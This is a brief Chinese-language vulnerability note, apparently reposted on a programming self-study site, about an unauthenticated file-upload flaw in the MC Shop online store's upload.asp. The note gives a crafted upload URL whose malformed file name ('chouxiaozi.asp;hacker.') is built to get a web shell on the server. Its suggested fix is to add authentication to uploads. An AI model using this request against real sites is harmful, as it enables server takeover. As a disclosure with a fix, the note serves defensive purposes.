好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

MC Shop网络商城文件上传漏洞与修复 - 网站安全

漏洞 描述:MC Shop网络商城后台上传未进行身份验证,导致构造上传畸型文件获取网站shell。

漏洞文件:upload. asp 存在上传漏洞 文件地址网站后台 构造上传: http://site/adminn/upload.asp?fuptype=adv&fupname=chouxiaozi.asp;hacker.&frmname=hf17pic

修复方案:

上传进行验证

 

查看更多关于MC Shop网络商城文件上传漏洞与修复 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11146
  阅读:50次

上一篇: .NET中防止Access数据库下载 - 网站安全 - 自学php

下一篇:感伤寒 网页挂马早预防 - 网站安全 - 自学php